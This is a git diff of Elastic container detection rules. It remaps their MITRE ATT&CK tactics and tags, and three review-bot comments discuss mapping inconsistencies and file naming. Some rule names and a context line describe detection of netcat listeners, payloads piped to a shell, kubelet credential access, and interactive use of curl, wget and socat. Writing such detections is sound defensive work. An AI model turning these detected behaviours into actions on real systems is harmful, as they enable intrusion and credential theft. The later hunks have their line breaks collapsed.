 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1574.006"
+name = "Dynamic Linker Hijacking"
+reference = "https://attack.mitre.org/techniques/T1574/006/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml b/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml
index 4168f4a7137..0632be00b6b 100644
--- a/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml
+++ b/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/05"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -54,15 +54,7 @@ references = [
 risk_score = 47
 rule_id = "227cf26a-88d1-4bcb-bf4c-925e5875abcf"
 severity = "medium"
-tags = [
- "Data Source: Elastic Defend for Containers",
- "Domain: Container",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Tactic: Execution",
- "Resources: Investigation Guide",
-]
+tags = ["Tactic: Defense Evasion", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -82,11 +74,6 @@ process where host.os.type == "linux" and event.type == "start" and event.action
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[[rule.threat.technique]]
-id = "T1027"
-name = "Obfuscated Files or Information"
-reference = "https://attack.mitre.org/techniques/T1027/"
-
 [[rule.threat.technique]]
 id = "T1140"
 name = "Deobfuscate/Decode Files or Information"
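Review bot: T1027 Obfuscated Files or Information is dropped from defense_evasion_potential_evasion_via_encoded_payload.toml in the last hunk here, while the companion rule defense_evasion_decoded_payload_piped_to_interpreter.toml gains T1027 plus the T1027.010 Command Obfuscation sub-technique in the same commit, so two rules that both key on encoded payloads now map the behaviour to different technique sets. If the intent is that only the decode-and-pipe rule covers obfuscation and this one covers decoding alone, that is defensible, but the asymmetry reads as accidental; either keep the T1027 technique block here or record the rationale in the commit description so the next mapping review does not re-open it.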
@@ -96,31 +83,3 @@ reference = "https://attack.mitre.org/techniques/T1140/"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
-
-[[rule.threat.technique]]
-id = "T1204"
-name = "User Execution"
-reference = "https://attack.mitre.org/techniques/T1204/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1204.002"
-name = "Malicious File"
-reference = "https://attack.mitre.org/techniques/T1204/002/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/integrations/cloud_defend/discovery_dns_enumeration.toml b/rules/integrations/cloud_defend/discovery_dns_enumeration.toml
index f09bad36a77..051c350fe9d 100644
--- a/rules/integrations/cloud_defend/discovery_dns_enumeration.toml
+++ b/rules/integrations/cloud_defend/discovery_dns_enumeration.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/27"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -119,16 +119,6 @@ id = "T1613"
 name = "Container and Resource Discovery"
 reference = "https://attack.mitre.org/techniques/T1613/"
 
-[[rule.threat.technique]]
-id = "T1016"
-name = "System Network Configuration Discovery"
-reference = "https://attack.mitre.org/techniques/T1016/"
-
-[[rule.threat.technique]]
-id = "T1049"
-name = "System Network Connections Discovery"
-reference = "https://attack.mitre.org/techniques/T1049/"
-
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
diff --git a/rules/integrations/cloud_defend/discovery_environment_enumeration.toml b/rules/integrations/cloud_defend/discovery_environment_enumeration.toml
index f5cef44a7f2..ebc953d4633 100644
--- a/rules/integrations/cloud_defend/discovery_environment_enumeration.toml
+++ b/rules/integrations/cloud_defend/discovery_environment_enumeration.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/27"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -96,11 +96,6 @@ process.interactive == true and container.id like "*"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[[rule.threat.technique]]
-id = "T1613"
-name = "Container and Resource Discovery"
-reference = "https://attack.mitre.org/techniques/T1613/"
-
 [[rule.threat.technique]]
 id = "T1082"
 name = "System Information Discovery"
diff --git a/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml b/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml
index 9a67f6171d9..97d638e70c1 100644
--- a/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml
+++ b/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/09"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -60,14 +60,7 @@ references = [
 risk_score = 21
 rule_id = "42de0740-8ed8-4b8b-995c-635b56a8bbf4"
 severity = "low"
-tags = [
- "Data Source: Elastic Defend for Containers",
- "Domain: Container",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Discovery",
- "Resources: Investigation Guide",
-]
+tags = ["Tactic: Credential Access", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -93,11 +86,16 @@ any where host.os.type == "linux" and process.interactive == true and container.
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1613"
-name = "Container and Resource Discovery"
-reference = "https://attack.mitre.org/techniques/T1613/"
+id = "T1552"
+name = "Unsecured Credentials"
+reference = "https://attack.mitre.org/techniques/T1552/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1552.004"
+name = "Private Keys"
+reference = "https://attack.mitre.org/techniques/T1552/004/"
 
 [rule.threat.tactic]
-id = "TA0007"
-name = "Discovery"
-reference = "https://attack.mitre.org/tactics/TA0007/"
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
diff --git a/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml b/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml
index 81381ad389b..8a09a1d7924 100644
--- a/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml
+++ b/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml
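Review bot: After the second hunk here discovery_kubelet_certificate_file_access.toml maps only to Credential Access (TA0006 / T1552.004) and its tags no longer mention Discovery, yet the file keeps its `discovery_` name prefix; the same drift appears later in this diff for execution_direct_interactive_kubernetes_api_request.toml (now Discovery and Lateral Movement), execution_interactive_file_creation_in_system_binary_locations.toml (now Command and Control and Defense Evasion) and execution_netcat_listener_established_inside_a_container.toml (now Command and Control only). If the `<tactic>_` prefix convention is relied on for locating or auditing rules, these four files should be renamed to their new primary tactic, presumably in a follow-up so this commit stays reviewable. The `rule_id` values are unchanged, which I take to be what identifies each rule rather than the path, but please confirm before renaming.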
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/06"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -93,16 +93,16 @@ process where host.os.type == "linux" and event.type == "start" and event.action
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
+[[rule.threat.technique]]
+id = "T1033"
+name = "System Owner/User Discovery"
+reference = "https://attack.mitre.org/techniques/T1033/"
+
 [[rule.threat.technique]]
 id = "T1613"
 name = "Container and Resource Discovery"
 reference = "https://attack.mitre.org/techniques/T1613/"
 
-[[rule.threat.technique]]
-id = "T1082"
-name = "System Information Discovery"
-reference = "https://attack.mitre.org/techniques/T1082/"
-
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
diff --git a/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml b/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml
index 5e447e2221b..1f55491b7bd 100644
--- a/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml
+++ b/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/06"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -101,11 +101,6 @@ id = "T1613"
 name = "Container and Resource Discovery"
 reference = "https://attack.mitre.org/techniques/T1613/"
 
-[[rule.threat.technique]]
-id = "T1082"
-name = "System Information Discovery"
-reference = "https://attack.mitre.org/techniques/T1082/"
-
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
diff --git a/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml b/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml
index 6b685a4acac..94048cb61ca 100644
--- a/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml
+++ b/rules/integrations/cloud_defend/discovery_suspicious_network_tool_launched_inside_a_container.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/15"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -66,16 +66,7 @@ Containers are lightweight, portable units that encapsulate applications and the
 risk_score = 21
 rule_id = "1a289854-5b78-49fe-9440-8a8096b1ab50"
 severity = "low"
-tags = [
- "Data Source: Elastic Defend for Containers",
- "Domain: Container",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Discovery",
- "Tactic: Command and Control",
- "Tactic: Reconnaissance",
- "Resources: Investigation Guide",
-]
+tags = ["Tactic: Discovery", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -121,6 +112,11 @@ not (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
+[[rule.threat.technique]]
+id = "T1040"
+name = "Network Sniffing"
+reference = "https://attack.mitre.org/techniques/T1040/"
+
 [[rule.threat.technique]]
 id = "T1046"
 name = "Network Service Discovery"
@@ -130,29 +126,3 @@ reference = "https://attack.mitre.org/techniques/T1046/"
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1105"
-name = "Ingress Tool Transfer"
-reference = "https://attack.mitre.org/techniques/T1105/"
-
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1595"
-name = "Active Scanning"
-reference = "https://attack.mitre.org/techniques/T1595/"
-
-[rule.threat.tactic]
-id = "TA0043"
-name = "Reconnaissance"
-reference = "https://attack.mitre.org/tactics/TA0043/"
diff --git a/rules/integrations/cloud_defend/discovery_tool_enumeration.toml b/rules/integrations/cloud_defend/discovery_tool_enumeration.toml
index b571d34b507..61bf6736889 100644
--- a/rules/integrations/cloud_defend/discovery_tool_enumeration.toml
+++ b/rules/integrations/cloud_defend/discovery_tool_enumeration.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/27"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -114,11 +114,6 @@ id = "T1518"
 name = "Software Discovery"
 reference = "https://attack.mitre.org/techniques/T1518/"
 
-[[rule.threat.technique]]
-id = "T1613"
-name = "Container and Resource Discovery"
-reference = "https://attack.mitre.org/techniques/T1613/"
-
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
diff --git a/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml b/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml
index eca6ed47139..6b067f4f645 100644
--- a/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml
+++ b/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/27"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -62,15 +62,7 @@ The rule flags interactive use of curl, wget, openssl, busybox ssl_client, socat
 risk_score = 21
 rule_id = "26a989d2-010e-4dae-b46b-689d03cc22b3"
 severity = "low"
-tags = [
- "Data Source: Elastic Defend for Containers",
- "Domain: Container",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Tactic: Discovery",
- "Resources: Investigation Guide",
-]
+tags = ["Tactic: Discovery", "Tactic: Lateral Movement", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -123,29 +115,29 @@ process.interactive == true and container.id like "*"
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
+id = "T1613"
+name = "Container and Resource Discovery"
+reference = "https://attack.mitre.org/techniques/T1613/"
 
 [rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1613"
-name = "Container and Resource Discovery"
-reference = "https://attack.mitre.org/techniques/T1613/"
+id = "T1550"
+name = "Use Alternate Authentication Material"
+reference = "https://attack.mitre.org/techniques/T1550/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1550.001"
+name = "Application Access Token"
+reference = "https://attack.mitre.org/techniques/T1550/001/"
 
 [rule.threat.tactic]
-id = "TA0007"
-name = "Discovery"
-reference = "https://attack.mitre.org/tactics/TA0007/"
+id = "TA0008"
+name = "Lateral Movement"
+reference = "https://attack.mitre.org/tactics/TA0008/"
diff --git a/rules/integrations/cloud_defend/execution_interactive_file_creation_followed_by_execution.toml b/rules/integrations/cloud_defend/execution_interactive_file_creation_followed_by_execution.toml
index 45afe8cf54e..40bd33e4804 100644
--- a/rules/integrations/cloud_defend/execution_interactive_file_creation_followed_by_execution.toml
+++ b/rules/integrations/cloud_defend/execution_interactive_file_creation_followed_by_execution.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/06"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -51,15 +51,7 @@ This detects an interactive session inside a running Linux container creating a
 risk_score = 47
 rule_id = "b799720e-40d0-4dd6-9c9c-4f193a6ed643"
 severity = "medium"
-tags = [
- "Data Source: Elastic Defend for Containers",
- "Domain: Container",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Tactic: Command and Control",
- "Resources: Investigation Guide",
-]
+tags = ["Tactic: Execution", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -74,11 +66,6 @@ sequence by container.id, user.id with maxspan=3s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[rule.threat.tactic]
-name = "Execution"
-id = "TA0002"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
@@ -89,15 +76,7 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"
 
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [rule.threat.tactic]
-name = "Command and Control"
-id = "TA0011"
-reference = "https://attack.mitre.org/tactics/TA0011/"
-
-[[rule.threat.technique]]
-name = "Application Layer Protocol"
-id = "T1071"
-reference = "https://attack.mitre.org/techniques/T1071/"
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml b/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml
index aa6c4f5a487..a7076eb7113 100644
--- a/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml
+++ b/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/06"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -52,16 +52,7 @@ This detects an interactive session in a running Linux container creating new fi
 risk_score = 47
 rule_id = "05a50000-9886-4695-ad33-3f990dc142e2"
 severity = "medium"
-tags = [
- "Data Source: Elastic Defend for Containers",
- "Domain: Container",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Tactic: Command and Control",
- "Tactic: Defense Evasion",
- "Resources: Investigation Guide",
-]
+tags = ["Tactic: Command and Control", "Tactic: Defense Evasion", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -78,38 +69,25 @@ file.path like (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[rule.threat.tactic]
-name = "Execution"
-id = "TA0002"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
 
 [rule.threat.tactic]
-name = "Command and Control"
 id = "TA0011"
+name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
 
-[[rule.threat.technique]]
-name = "Application Layer Protocol"
-id = "T1071"
-reference = "https://attack.mitre.org/techniques/T1071/"
-
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
+[[rule.threat.technique]]
+id = "T1036"
+name = "Masquerading"
+reference = "https://attack.mitre.org/techniques/T1036/"
+
 [rule.threat.tactic]
-name = "Defense Evasion"
 id = "TA0005"
+name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/cloud_defend/execution_interactive_shell_spawned_from_inside_a_container.toml b/rules/integrations/cloud_defend/execution_interactive_shell_spawned_from_inside_a_container.toml
index 6b221375e8f..01fd7364cb3 100644
--- a/rules/integrations/cloud_defend/execution_interactive_shell_spawned_from_inside_a_container.toml
+++ b/rules/integrations/cloud_defend/execution_interactive_shell_spawned_from_inside_a_container.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/15"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -98,6 +98,11 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"
 
+[[rule.threat.technique]]
+id = "T1609"
+name = "Container Administration Command"
+reference = "https://attack.mitre.org/techniques/T1609/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
diff --git a/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml b/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml
index 4d369ab6944..9ecd8a31745 100644
--- a/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml
+++ b/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/09"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -88,29 +88,24 @@ process.interactive == true and container.id like "?*"
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
+id = "T1613"
+name = "Container and Resource Discovery"
+reference = "https://attack.mitre.org/techniques/T1613/"
 
 [rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1613"
-name = "Container and Resource Discovery"
-reference = "https://attack.mitre.org/techniques/T1613/"
+id = "T1609"
+name = "Container Administration Command"
+reference = "https://attack.mitre.org/techniques/T1609/"
 
 [rule.threat.tactic]
-id = "TA0007"
-name = "Discovery"
-reference = "https://attack.mitre.org/tactics/TA0007/"
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml b/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml
index 8c8ff36688b..eec7a040eab 100644
--- a/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml
+++ b/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/15"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -66,14 +66,7 @@ Netcat is a versatile networking tool used for reading and writing data across n risk_score = 47 rule_id = "a52a9439-d52c-401c-be37-2785235c6547" severity = "medium" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide", -] +tags = ["Tactic: Command and Control", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -112,16 +105,11 @@ process.args like~ ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml b/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml index 929a3fbb945..8be32a0812f 100644 --- a/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml +++ b/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
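Review bot: After this hunk the netcat listener rule carries only `"Tactic: Command and Control"` and a single TA0011 threat entry, yet the file keeps its `execution_` path prefix; the same mismatch appears for the kubelet-access rule (now Discovery and Lateral Movement) and the chmod rule (now Defense Evasion only) further down this patch. I cannot tell from here whether anything in the repository derives or validates a rule's tactic from that prefix, so if it is purely historical a sentence in the commit description would save the next reader the question. Separately, the `tags` array is collapsed from one entry per line to a single line and the `Tactic:` entry is moved ahead of the data-source tags, whereas the ded and fim hunks later in the patch leave their `Tactic:` tags in the middle of the list; picking one placement keeps tag ordering from becoming a per-integration convention.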
@@ -54,16 +54,7 @@ references = [ risk_score = 47 rule_id = "a750bbcc-863f-41ef-9924-fd8224e23694" severity = "medium" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Command and Control", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -99,10 +90,18 @@ sequence by process.parent.entity_id, container.id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] -name = "Execution" -id = "TA0002" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" @@ -114,23 +113,7 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -name = "Command and Control" -id = "TA0011" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat.technique]] -name = "Application Layer Protocol" -id = "T1071" -reference = "https://attack.mitre.org/techniques/T1071/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [rule.threat.tactic] -name = "Defense Evasion" -id = "TA0005" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" 
diff --git a/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml b/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml index 1e80e6c6c4e..fb7dbc5c834 100644 --- a/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml +++ b/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -59,15 +59,7 @@ references = [ risk_score = 47 rule_id = "b4bd186b-69c6-45ad-8bef-5c35bbadeaef" severity = "medium" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Discovery", - "Resources: Investigation Guide", -] +tags = ["Tactic: Discovery", "Tactic: Lateral Movement", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
